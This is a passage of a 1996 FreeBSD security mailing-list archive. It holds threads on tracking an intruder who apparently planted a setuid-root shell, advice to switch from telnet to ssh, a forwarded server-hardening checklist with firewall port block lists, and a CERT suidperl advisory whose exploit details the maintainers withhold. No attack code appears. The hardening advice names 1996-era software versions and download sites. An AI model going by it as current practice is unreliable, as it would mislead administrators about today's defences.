satoshi and/or gary about the ports. Nate From owner-freebsd-security Wed Jun 26 13:23:21 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA07968 for security-outgoing; Wed, 26 Jun 1996 13:23:21 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA07955 for ; Wed, 26 Jun 1996 13:23:18 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id RAA19313; Tue, 25 Jun 1996 17:35:44 -0700 (PDT) Date: Tue, 25 Jun 1996 17:35:44 -0700 (PDT) From: -Vince- To: "Jonathan M. Bresler" cc: jbhunt , mark@grumble.grondar.za, msmith@atrad.adelaide.edu.au, mark@grondar.za, security@FreeBSD.ORG, chad@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606260020.RAA12620@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Jonathan M. Bresler wrote: > jbhunt wrote: > > > > Yes I read the security reports as I said it hasn't been reporting any > > unusual suid programs. No, he won't tell me I already asked of course. As > > vince stated we are remote admin's we both have to su to root so the only > > person on the actual console is chad. As for running a script I know for > > could be a new one or could be a moldy old one. > you have to su to root on a remote computer. > how do you get access to the remote macine? telnet? serial line? > encrypted? or in the clear? We telnet and relogin from thousands of miles away.... > > a fact that I wasn't running anything at the time. I know this guys > > methods for the most part so I am almost sure he has some new exploit. He > > also claims to have one that EVERY linux box is vulnerable to of course > > he won't tell me or give it to me. Vince From owner-freebsd-security Wed Jun 26 13:45:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA10181 for security-outgoing; Wed, 26 Jun 1996 13:45:06 -0700 (PDT) Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA10170 for ; Wed, 26 Jun 1996 13:45:02 -0700 (PDT) Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id NAA10284; Wed, 26 Jun 1996 13:46:35 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id NAA21644; Wed, 26 Jun 1996 13:44:58 -0700 (PDT) X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol To: -Vince- Cc: security@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Tue, 25 Jun 1996 17:35:44 PDT." Date: Wed, 26 Jun 1996 13:44:57 PDT Message-ID: <21642.835821897@waldrog.cs.uidaho.edu> From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... We telnet and relogin from thousands of miles away.... use ssh. From owner-freebsd-security Wed Jun 26 13:55:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA11058 for security-outgoing; Wed, 26 Jun 1996 13:55:23 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA11024; Wed, 26 Jun 1996 13:55:12 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA03044; Wed, 26 Jun 1996 13:55:05 -0700 (PDT) Date: Wed, 26 Jun 1996 13:55:05 -0700 (PDT) From: -Vince- To: "Michael L. VanLoon -- HeadCandy.com" cc: "Eric J. Schwertfeger" , Mark Murray , hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606260511.WAA00500@MindBender.HeadCandy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote: > >On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote: > >> On Tue, 25 Jun 1996, -Vince- wrote: > > >> > Yeah, you have a point but jbhunt was watching the user as he > >> > hacked root since he brought the file from his own machine.... so that > >> > wasn't something the admin was tricked into doing.. > > >> Then the important question is, how did he move the file so that it > >> retained the setuid bit? We're already pretty sure that the program is > >> only /bin/sh with the setuid bit turned on. So either he found a way to > >> move the file with the bit turned on, or he found a way to turn it on, > >> which reqires root access. > > > It was a remote login so he had to transfer it over somehow... > > Well, *if* that's true, it still wouldn't be setuid root just from the > transfer. He'd *still* have to get root some other way to make this > binary setuid root. > > But if he's going to do that, why bother copying a binary over the > network -- it would just be easier to just snag a copy of your own > /bin/sh and mark it setuid root. Hmmm, what happens if he tars it first and then sends it over? Vince From owner-freebsd-security Wed Jun 26 14:01:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA11574 for security-outgoing; Wed, 26 Jun 1996 14:01:01 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA11567 for ; Wed, 26 Jun 1996 14:00:57 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id OAA03572; Wed, 26 Jun 1996 14:00:39 -0700 (PDT) Date: Wed, 26 Jun 1996 14:00:39 -0700 (PDT) From: -Vince- To: faried nawaz cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <21642.835821897@waldrog.cs.uidaho.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 26 Jun 1996, faried nawaz wrote: > -Vince- wrote... > > > We telnet and relogin from thousands of miles away.... > > use ssh. What is ssh and where can we get it? Vince From owner-freebsd-security Wed Jun 26 14:16:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13072 for security-outgoing; Wed, 26 Jun 1996 14:16:04 -0700 (PDT) Received: from mom.hooked.net (root@mom.hooked.net [206.80.6.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13008 for ; Wed, 26 Jun 1996 14:15:51 -0700 (PDT) Received: from also-27.ppp.hooked.net (bass-56.ppp.hooked.net [206.80.8.120]) by mom.hooked.net (8.7.4/8.7.3) with SMTP id OAA15442 for ; Wed, 26 Jun 1996 14:15:47 -0700 (PDT) Message-ID: <31C86AF7.3517@narf.castroms.moreland.k12.ca.us> Date: Wed, 19 Jun 1996 14:02:47 -0700 From: Almost Anonymous Organization: Manx Consulting Services X-Mailer: Mozilla 2.02 (Win16; I) MIME-Version: 1.0 To: security@freebsd.org Subject: How Secure Out Of The Box? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I am sure this has been asked 15 million times over, but here it is again: How secure is FreeBSD out of the box? Assuming I didn't have an account on the system, and the passwords are protected and well made (IE: efgREG739FJFhkh could be root), how easy/hard is it to crack? We have had some attempts (and 1 successfull on a linux box at the District Office) on a FreeBSD machine from a group called r00t, and I wanted to make sure that my precious little box is secure. Thanks for your time! --matt Clark From owner-freebsd-security Wed Jun 26 14:19:33 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13239 for security-outgoing; Wed, 26 Jun 1996 14:19:33 -0700 (PDT) Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13225 for ; Wed, 26 Jun 1996 14:19:29 -0700 (PDT) Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id OAA10477; Wed, 26 Jun 1996 14:20:57 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id OAA21672; Wed, 26 Jun 1996 14:19:19 -0700 (PDT) X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol To: -Vince- cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Wed, 26 Jun 1996 14:00:39 PDT." Date: Wed, 26 Jun 1996 14:19:19 PDT Message-ID: <21670.835823959@waldrog.cs.uidaho.edu> From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... What is ssh and where can we get it? there is a port. if you don't want to use the port, it's available off ftp.cs.hut.fi:/pub/ssh/; info on http://www.cs.hut.fi/ssh/. From owner-freebsd-security Wed Jun 26 14:22:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13518 for security-outgoing; Wed, 26 Jun 1996 14:22:56 -0700 (PDT) Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13511 for ; Wed, 26 Jun 1996 14:22:53 -0700 (PDT) Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id OAA10504; Wed, 26 Jun 1996 14:24:23 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id OAA21681; Wed, 26 Jun 1996 14:22:46 -0700 (PDT) X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol To: -Vince- cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Wed, 26 Jun 1996 14:00:39 PDT." Date: Wed, 26 Jun 1996 14:22:46 PDT Message-ID: <21679.835824166@waldrog.cs.uidaho.edu> From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... What is ssh and where can we get it? oops, only answered one question. ssh is secure shell. if you use rlogin or rsh or rcp, you can use ssh. it also encrypts your session from point a to point b, so you won't have problems with passwords being snooped (you can also use rsa authentication instead of straight passwords). also can do port forwarding and other fun stuff. From owner-freebsd-security Wed Jun 26 14:28:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13904 for security-outgoing; Wed, 26 Jun 1996 14:28:47 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13891 for ; Wed, 26 Jun 1996 14:28:44 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id OAA06641; Wed, 26 Jun 1996 14:28:34 -0700 (PDT) Date: Wed, 26 Jun 1996 14:28:34 -0700 (PDT) From: -Vince- To: faried nawaz cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <21679.835824166@waldrog.cs.uidaho.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 26 Jun 1996, faried nawaz wrote: > -Vince- wrote... > > What is ssh and where can we get it? > > oops, only answered one question. > > ssh is secure shell. if you use rlogin or rsh or rcp, you can use ssh. it > also encrypts your session from point a to point b, so you won't have problems > with passwords being snooped (you can also use rsa authentication instead of > straight passwords). also can do port forwarding and other fun stuff. What happens if you want to use tcsh/csh as the shell? VInce From owner-freebsd-security Wed Jun 26 14:41:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA15506 for security-outgoing; Wed, 26 Jun 1996 14:41:22 -0700 (PDT) Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA15501 for ; Wed, 26 Jun 1996 14:41:16 -0700 (PDT) Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id OAA10599; Wed, 26 Jun 1996 14:42:33 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id OAA21704; Wed, 26 Jun 1996 14:40:56 -0700 (PDT) X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol To: -Vince- cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Wed, 26 Jun 1996 14:28:34 PDT." Date: Wed, 26 Jun 1996 14:40:55 PDT Message-ID: <21702.835825255@waldrog.cs.uidaho.edu> From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... What happens if you want to use tcsh/csh as the shell? It doesn't care what shell you use, for the most part. I think you should try the web page. From owner-freebsd-security Wed Jun 26 15:00:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA19758 for security-outgoing; Wed, 26 Jun 1996 15:00:55 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA19727 for ; Wed, 26 Jun 1996 15:00:46 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id AAA24286; Thu, 27 Jun 1996 00:00:15 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606262200.AAA24286@gvr.win.tue.nl> Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) To: taob@io.org (Brian Tao) Date: Thu, 27 Jun 1996 00:00:14 +0200 (MET DST) Cc: freebsd-security@freebsd.org In-Reply-To: from Brian Tao at "Jun 26, 96 02:38:13 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Brian Tao wrote: [There is text before PGP section.] > I believe this applies to perl4 as shipped with all versions of > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > the actual vulnerability is? We know. This bug was first reported by Paul Traina to CERT. Of course we're not going to get into details. -Guido From owner-freebsd-security Wed Jun 26 15:07:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA21061 for security-outgoing; Wed, 26 Jun 1996 15:07:20 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA20638 for ; Wed, 26 Jun 1996 15:04:51 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id SAA06518; Wed, 26 Jun 1996 18:01:11 -0400 (EDT) Date: Wed, 26 Jun 1996 18:02:05 -0400 (EDT) From: Brian Tao To: Almost Anonymous cc: FREEBSD-SECURITY-L Subject: Re: How secure is FreeBSD 2.1 right after install? (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is a helpful article Cy posted a few months ago. It's a good checklist that you should go through to ensure that you have an audited and controlled security plan. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" ---------- Forwarded message ---------- Date: Mon, 11 Mar 96 07:00:17 -0800 From: Cy Schubert - BCSC Open Systems Group Reply-To: cschuber@orca.gov.bc.ca To: sreid@edmbbs.iceonline.com Cc: security@FreeBSD.ORG Subject: Re: How secure is FreeBSD 2.1 right after install? > > Is there anything I need to do to secure my system after a fresh install > >from the Walnut Creek CD? > > I've already disabled the r*, finger and telnet services in inetd.conf. > I don't expect I'll need them. Is there anything else I need to worry > about? > > Our local ethernet will start with two FreeBSD machines and a Cisco > router, connected to the internet. One of the FreeBSD machines will be a > web server (probably running Apache) and the other will be for web page > development under X Windows. > > I'm concerned that X might be a potential security hole, since it uses > TCP port 6000 to accept connections from clients... Can I close off > remote access to the X server without having to install a firewall? I > won't need to access the X server from the LAN. Can X be set to ignore > the TCP port? > > I'm interested in anything that might be a security problem. > Here are some basic steps I would start with: 1. Install TCP/Wrapper and block all of your TCP services run out of inetd. 2. Recompile the kernel to make use of the IP Firewall code, then block TCP ports 7, 9, 13, 19, 37, 53, 67, 88, 111, 161, 162, 177, 512, 513, 514, 520, 2049, 1, 11, 15, 43, 95, 123, 144, 515, 651, 2000, 6000-6100, ypserv yppasswdd, ypbind, mountd, and nfs. I would also block UDP ports 7, 9, 13, 19, 37, 53, 67, 88, 111, 161, 162, 177, 512, 513, 514, 520, 2049, ypserv, yppasswd, ypbind, mountd, nfs, and port 1023. You could also block TCP services run out of inetd as well, however TCP/Wrapper does a better job of reporting and does some "PARANOID" checks against the DNS that filtering will not do. If you're really paranoid you could block those ports. On the other hand you would probably be better off blocking these ports at your router. If you're really paranoid you could do both. Many of the commercial firewalls consist of two routers and a bastion host (firewall machine). If you allow dial-in connections much of this may be of no use since many hackers also phreak telephone lines. 3. Install Tripwire. 4. Run CRACK and COPS or Tiger on a weekly basis. 5. Route all auth.* messages to another machine and report on all anomolies. 6. Replace Sendmail 8.6.12 with Sendmail 8.7.4 and install smrsh. 7. If you don't expect to receive mail from the Internet on your FreeBSD boxes run Sendmail out of inetd and cron, then wrap it with TCP/Wrapper. If you don't need to receive mail at all don't even run sendmail out of inetd, just let sendmail queue messages from cron. This is what comres to mind at the moment. There's a lot more you could do if you want to spend the time at it. Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET BC Systems Corp. Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." From owner-freebsd-security Wed Jun 26 15:07:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA21188 for security-outgoing; Wed, 26 Jun 1996 15:07:59 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA21128 for ; Wed, 26 Jun 1996 15:07:44 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id AAA24375; Thu, 27 Jun 1996 00:06:50 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606262206.AAA24375@gvr.win.tue.nl> Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) To: nate@mt.sri.com (Nate Williams) Date: Thu, 27 Jun 1996 00:06:49 +0200 (MET DST) Cc: taob@io.org, freebsd-security@FreeBSD.ORG In-Reply-To: <199606261914.NAA05459@rocky.mt.sri.com> from Nate Williams at "Jun 26, 96 01:14:32 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Nate Williams wrote: > > I believe this applies to perl4 as shipped with all versions of > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > > the actual vulnerability is? > > I don't, but thanks for bringing this up. I was planning on bringing > this in but I forgot. I just applied the suggested change to the > version of perl in -stable and -current, so it'll be in 2.1.5. > We already were no longer vulnerable. Howver, the applied fix won;t hurt. -Guido From owner-freebsd-security Wed Jun 26 15:27:54 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA26335 for security-outgoing; Wed, 26 Jun 1996 15:27:54 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA26189 for ; Wed, 26 Jun 1996 15:27:26 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id SAA06682; Wed, 26 Jun 1996 18:23:13 -0400 (EDT) Date: Wed, 26 Jun 1996 18:24:07 -0400 (EDT) From: Brian Tao To: Guido van Rooij cc: freebsd-security@freebsd.org Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) In-Reply-To: <199606262200.AAA24286@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Thu, 27 Jun 1996, Guido van Rooij wrote: > > We know. This bug was first reported by Paul Traina to CERT. > Of course we're not going to get into details. Yeah, I noticed his name near the end. Since we're not vulnerable, what is the exploit? I mean, if I don't hear it from this list or CERT, it'll probably show up in Bugtraq or BoS anyway. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Wed Jun 26 15:28:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA26437 for security-outgoing; Wed, 26 Jun 1996 15:28:10 -0700 (PDT) Received: from circle.net (demeter.circle.net [207.79.160.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA26380 for ; Wed, 26 Jun 1996 15:27:59 -0700 (PDT) Received: (from troy@localhost) by circle.net (8.7.5/8.7.3) id SAA15943; Wed, 26 Jun 1996 18:27:59 -0400 (EDT) Date: Wed, 26 Jun 1996 18:27:58 -0400 (EDT) From: Troy Arie Cobb To: security@freebsd.org Subject: Odd permission changes In-Reply-To: <31C86AF7.3517@narf.castroms.moreland.k12.ca.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I have a strange thing that's been happening regularly now, following an incident w/ a cracker-type (who is now long gone). Now, on Fridays, around 2am, all of the owner-execute permissions on all files is removed. This has happened two weeks in a row now, I have accounting active and saw the chmod, but no one was logged in, and the daily/weekly scripts don't have any chmods in them. I need to buy a clue, any help? - troy Troy Arie Cobb troy@circle.net ------------------------------------------------------ | Circle Net, Inc. | global internet access | | http://www.circle.net | for western north carolina | | info@circle.net | and beyond... | | 704-254-9500 | | ------------------------------------------------------ From owner-freebsd-security Wed Jun 26 15:36:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA28836 for security-outgoing; Wed, 26 Jun 1996 15:36:50 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA28817 for ; Wed, 26 Jun 1996 15:36:48 -0700 (PDT) Received: from localhost (scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) with SMTP id SAA11672; Wed, 26 Jun 1996 18:36:33 -0400 (EDT) Date: Wed, 26 Jun 1996 18:36:33 -0400 (EDT) From: Scanner To: Almost Anonymous cc: security@FreeBSD.ORG Subject: Re: How Secure Out Of The Box? In-Reply-To: <31C86AF7.3517@narf.castroms.moreland.k12.ca.us> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 19 Jun 1996, Almost Anonymous wrote: > I am sure this has been asked 15 million times over, but here it is again: > > How secure is FreeBSD out of the box? Assuming I didn't have an account on the system, and the passwords are > protected and well made (IE: efgREG739FJFhkh could be root), how easy/hard is it to crack? We have had some > attempts (and 1 successfull on a linux box at the District Office) on a FreeBSD machine from a group called > r00t, and I wanted to make sure that my precious little box is secure. Thanks for your time! r00t is a group of know nothing script kiddies. Your linux can is not a shock. But if you implement tcp_wrappers, and ipfw i would tell you to not break sweat about r00t. Half of them dont even hack, the other half are irc lusers who hang on #hack. Bah. lame lame lame. -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net http://www.freebsd.org | SysAdmin / Network Engineer / Security ===================================| Member BSDNET team! http://www.bsdnet.org From owner-freebsd-security Wed Jun 26 15:41:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA29582 for security-outgoing; Wed, 26 Jun 1996 15:41:24 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA29575 for ; Wed, 26 Jun 1996 15:41:20 -0700 (PDT) Received: from localhost (scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) with SMTP id SAA11836; Wed, 26 Jun 1996 18:40:56 -0400 (EDT) Date: Wed, 26 Jun 1996 18:40:56 -0400 (EDT) From: Scanner To: Guido van Rooij cc: Brian Tao , freebsd-security@freebsd.org Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) In-Reply-To: <199606262200.AAA24286@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Thu, 27 Jun 1996, Guido van Rooij wrote: > Brian Tao wrote: > [There is text before PGP section.] > > I believe this applies to perl4 as shipped with all versions of > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > > the actual vulnerability is? > > We know. This bug was first reported by Paul Traina to CERT. > Of course we're not going to get into details. Ok sure fine take all the fun out of it. :-) -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net http://www.freebsd.org | SysAdmin / Network Engineer / Security ===================================| Member BSDNET team! http://www.bsdnet.org From owner-freebsd-security Wed Jun 26 15:43:53 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA29757 for security-outgoing; Wed, 26 Jun 1996 15:43:53 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA29742 for ; Wed, 26 Jun 1996 15:43:50 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id AAA03381; Thu, 27 Jun 1996 00:43:45 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id AAA24890; Thu, 27 Jun 1996 00:43:25 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.5/keltia-uucp-2.8) id XAA11416; Wed, 26 Jun 1996 23:58:29 +0200 (MET DST) From: Ollivier Robert Message-Id: <199606262158.XAA11416@keltia.freenix.fr> Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Wed, 26 Jun 1996 23:58:29 +0200 (MET DST) Cc: security@FreeBSD.ORG In-Reply-To: from -Vince- at "Jun 25, 96 05:35:44 pm" X-Operating-System: FreeBSD 2.2-CURRENT ctm#2111 X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk It seems that -Vince- said: > We telnet and relogin from thousands of miles away.... SSH is your only friend here. . You could also use en encrypted telnet or STEL or SSL/Telnet but no one comes near SSH. -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996 From owner-freebsd-security Wed Jun 26 16:11:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA01578 for security-outgoing; Wed, 26 Jun 1996 16:11:11 -0700 (PDT) Received: from gatekeeper.fsl.noaa.gov (gatekeeper.fsl.noaa.gov [137.75.131.181]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA01573 for ; Wed, 26 Jun 1996 16:11:08 -0700 (PDT) Received: from emu.fsl.noaa.gov (kelly@emu.fsl.noaa.gov [137.75.60.32]) by gatekeeper.fsl.noaa.gov (8.7.5/8.7.3) with ESMTP id XAA20975; Wed, 26 Jun 1996 23:11:03 GMT Message-Id: <199606262311.XAA20975@gatekeeper.fsl.noaa.gov> Received: by emu.fsl.noaa.gov (1.40.112.4/16.2) id AA095320693; Wed, 26 Jun 1996 17:11:33 -0600 Date: Wed, 26 Jun 1996 17:11:33 -0600 From: Sean Kelly To: troy@circle.net Cc: security@freebsd.org In-Reply-To: (message from Troy Arie Cobb on Wed, 26 Jun 1996 